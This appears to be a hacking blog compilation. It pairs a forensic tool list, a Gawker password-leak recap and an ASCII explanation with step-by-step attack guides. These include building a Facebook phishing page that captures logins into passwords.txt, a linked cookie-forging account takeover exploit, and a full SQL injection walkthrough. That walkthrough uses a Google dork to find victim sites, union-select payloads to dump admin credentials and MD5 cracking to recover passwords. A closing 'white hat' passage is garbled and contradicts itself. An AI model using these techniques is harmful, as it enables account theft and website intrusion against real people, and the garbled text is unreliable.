This is a collection system which was used by the FBI to analyze and investigate the other computer.The equipment available in this collection are :
  • ADS Locator (Alternate Data Streams)
  • Historian 1.4 (Web Browser Analyzer)
  • Disc Investigator 1.4 (Disc Analyzer)
  • Live View 0.6 (System Analyzer)
  • MUI Cacheview 1.00 (Registry Analyzer)
  • Networkminer 0.85 (Network Analyzer)
  • Regripper 2.02 (Registry Analyzer)
  • Systemreport 2.54 (PC Analyzer)
  • USB-History R1 (USB-Stick Analyzer)
  • Windows File Analyzer (File Analyzer)
  • Winpcap 4.02 (Network)
Size : 6.85Mb


Go to Download page to download it.

1) Go to Facebook, and View the Page Source code, copy all the code to notepad.
2) You have to make several changes to the code by pressing Control + F.
3) Find this word :action
4) You will get this code as follows : "action = www.facebook.com /login and bla bla bla".
5) Remove all "tuu facebook.com and bla bla", and put : "lol.php".
6) In addition, you will find the code as follows : "method = post".
7) Change the "post" to "get" and Save the file. Rename the file to"index.php" and put the files on the desktop, but REMEMBER! where they will ask : "Save as type" change it to "all files".
This is very IMPORTANT!
9) Create a new file in notepad, and put this code :


10) Now, Save the file as "lol.php" and remember the "Save as file typeto "All files".
11) Then, create a notepad file, let it fill an empty notepad and save itas: "passwords.txt".
12) Lastly, load all the files into your hosting http://yourhosting.com/

Hacking Facebook using Cookie (Javascript Vulnerability - milw0rm)


- from Cadmation milw0rm exploit code -


It will create a local cookie using any Facebook user ID, which will trick the browser / facebook.com to think that you are logged into the profile of a given user ID.
So when you type www.facebook.com in your web browser will automatically log in to the profile of the user ID given up.



Code :
http://archives.milw0rm-collected.ru/cgi/exploit/web/acc3/code-5/cadmation.c


Go to Download page to download it.

Ok hmmm.. as common i'm facing my facebook and do some blogging stuff... boring! .. but one day, i opened my email, there an email from a website that I have registered as user.It's giving information and promotion about famous website which is currently being used by all human beings on this earth and it was in script.It means you can create the same kind of website such as facebook,myspace, friendster, youtube, 4shared and many others.
There a lots of website information in there that can helps us making money..Want to know about the site? Here you go.. www.vivaprograms.org
Oppps! out of topic a litle bit .. ahaks! i have found many scripts
 on that website which were can be downloadSo, I came across an interesting script on that website, now i'm playing with the script while sharpening the skills and knowledges in the ICT.


Have fun there!

Readers of Gizmodo, Lifehacker and Gawker Media site that others may be included in the website of the most efficient, but the most commonly used to enter into the website was very embarrassing because it is too easy to guess : "123456." That is also the ni :"password."



On Sunday night, many hackers who make a base set of data from Gawker Media, including username, email address and password that is more than one million registered users. All the keywords that were originally in the form encrypted, but 188,279 of the keyword's successfully translated and disseminated to the public as one of the hacker hobbies. Using the data set, we find there are 50 most popular keywords in the database Gawker Media.

At least there are two keywords that are related to science fiction "trustno1" which is related to the Special Agent Mulder keywords in "The X-Files", and "thx1138" which is related to the one owned by George Lucas film that implies a time distopia future. In addition, there are also just the keywords looks nerdy / geeky such as "dragon", "superman", "princess", "starwars", and"nintendo".




Meaning in Bahasa Malaysia :
Pembaca kepada Gizmodo, Lifehacker dan laman web Gawker Media yang lain mungkin tergolong di dalam laman web yang paling jimat, tetapi kebanyakkan yang biasa digunakan untuk memasukki ke dalam laman web tersebut adalah amatlah memalukan kerana terlalu senang untuk diteka: “123456.” Begitulah juga yang ni: “password.”
Pada malam ahad, ramai penggodam yang menyebarkan sekumpulan data dari pangkalan Gawker Media termasuk nama pengguna, alamat emel dan kata kunci yang lebih dari satu juta pengguna berdaftar. Kesemua kata kunci itu asalnya adalah dalam bentuk encrypte, tetapi 188,279 daripada kesemua kata kunci itu berjaya diterjemahkan dan disebarkan kepada awam sebagai salah satu usaha penggodam. Dengan menggunakan set data itu, kami menemui 50 kata kunci paling popular di pangkalan Gawker Media.
Sekurang-kurang terdapat 2 kata kunci adalah berkaitan sains fiksyen iaitu : “trustno1″iaitu berkaitan dengan Special Agent Mulder punye kata kunci di dalam "The X-Files", dan "thx1138" iaitu berkaitan dengan satu filem milik George Lucas yang membayangkan sebuah masa depan distopia. Selain itu, terdapat juga kata kunci yang cuma ala-ala klasik nerdy seperti : "dragon", "superman", "princess", "starwars", dan "nintendo".

American Standard Code for Information Interchange
Coding scheme in which each character, the computer can access, given integer code between 0 and 127. When more than 127 characters are needed, internet Unicode character sets or one set of parts are used. ASCII code 127 may be defined as the first set of Unicode. A subtile, but what is important is that the character set encoding no relation to its original character has been created.


Please try using the ASCII Converter is designed by me. Hope it can help solve your job.
Meaning in Bahasa Malaysia :
Skema pengekodan dimana setiap aksara, komputer dapat mengakses, diberikan kod integer antara 0 dan 127. Apabila lebih dari 127 aksara yang diperlukan, set aksara Unicode internet atau salah satu himpunan bahagian lain digunakan. ASCII boleh ditakrifkan sebagai 127 kod pertama di set Unicode. Satu subtile tetapi apa yang penting adalah bahawa set encoding aksara tidak ada hubungan dengan bentuk sebenarnya aksara yang telah dicipta.
Sila cuba menggunakan ASCII Converter yang direka khas oleh saya. Harap ia dapat membantu menyelesaikan kerja anda.

Keywords you should/must know :
Character : ', -
Comments : /*, --
INFORMATION :

  1. "Information_schema" only worked on MYSQL Versi 5.x and above.
  2. "Information_schema" not worked on MYSQL Versi 4.x.xx and below.
Google Dork that you should use is "inurl:news.php?id="
Go to www.google.com and search for victim site with that dork.


Step 1

[site]/news.php?id=1
--- Add character at the end of the url to look at any site so we can find if the site is vuln to SQL Injection or not.


Example :
[site]/news.php?id=1'
atau
[site]/news.php?id=-1


Example Error came out :
Warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

Step 2

Find how many table was in the database.
-- Put +order+by+1-- at the end of the url.


Example :
[site]/news.php?id=1+order+by+1--
or
[site]/news.php?id=1+order+by+1/* Check it gradually
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/* Until error come out on it page.
[site]/news.php?id=1+order+by+4/* Error came out on table number 4!
And so for this tutorial, the total table in the database for the site is 3
.

Step 3

Use the Union Select command with sequence table obtained during the second step to retrieve the numbers that we will use later. In the present case, the sequence numbers are up three tables.


--- Command will be used : +union+select+1,2,3--
Example :
[site]/news.php?id=1+union+select+1,2,3--
 Figures 2 pop out on the page site.



--- Then, we enter the version() on that figures 2,
Example :
[site]/news.php?id=1+union+select+1,version(),3--
and the version will appear in the figures on the page.

Example :
5.1.47-community-log

INFORMATION :

user() = getting 
username that used with the database

(Contoh : mae21@localhost)
database() = getting the database name
(Contoh : mae21_db)
version() = getting what version of their mysql
(Contoh : 5.1.47-community-log)
Step 4

To retrieve all table names on the site, use this command

table_name

--- Put in the numbers (2) that came out earlier.
+from+information_schema.tables--
--- Put it at the end of the url.


Example :
[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--

Step 5
Copy all the contents of the information contained in the table.

group_concat(table_name)

--- Put in the numbers (2) that came out earlier.
+from+information_schema.tables+where+table_schema=database()--
--- Put it at the end of the url.


Example :
[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--


Step 6
Remove the existing content in TABLE

group_concat(column_name)
--- Put in the numbers (2) that came out earlier.
+from+information_schema.columns+where+table_name=0xHEXA--
(PUT THE TABLE NAME ALREADY CONVERTED TO HEXADECIMEL)


INFORMATION:
Website that can be used to convert the table name to hexadecimel

Column that we will use as for example is ADMIN.
When it converted the result was 41444D494E 
Example :
[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--


Step 7

Remove the contents of the results we have obtained from the table ADMIN


concat_ws(0x3a,"column names contained in the ADMIN's table")

--- Put in the numbers (2) that came out earlier.
+from+Admin--
--- Original's column


Example :
[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--
And we will get admin username and password data for the website.
The information coming out is as follows :
 "webmaster admin:8dded6912a401ad44ec9b688fd124e22"


Decrypt MD5 Hash of the information contained in www.md5decrypter.co.uk

8dded6912a401ad44ec9b688fd124e22
= "iluvmyself" (decrypted!)

Now you have the username and password for the website.

Step 8 (Last Step)

Find the Login page for admin..
"
Happy trying it and enjoy hacking for education ..." :)

White Hat :
Hacker in this category are more likely to use their knowledge to satisfy the intellectual curiosity of the damage to evil. Hackers such as these are waiting to damage a system, theft of data or damage the work of an organization. However, their activities still be allowed by the law if they want to test a system owned by someone else where they do not have permission for it. In its activities, often among those doing the damage was not deliberate, such as changing or deleting data. Most hackers are working officially as specified in the company as a programmer, consultant and admin server.

Related Posts Plugin for WordPress, Blogger...
© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.

Networked Blog

Follow Me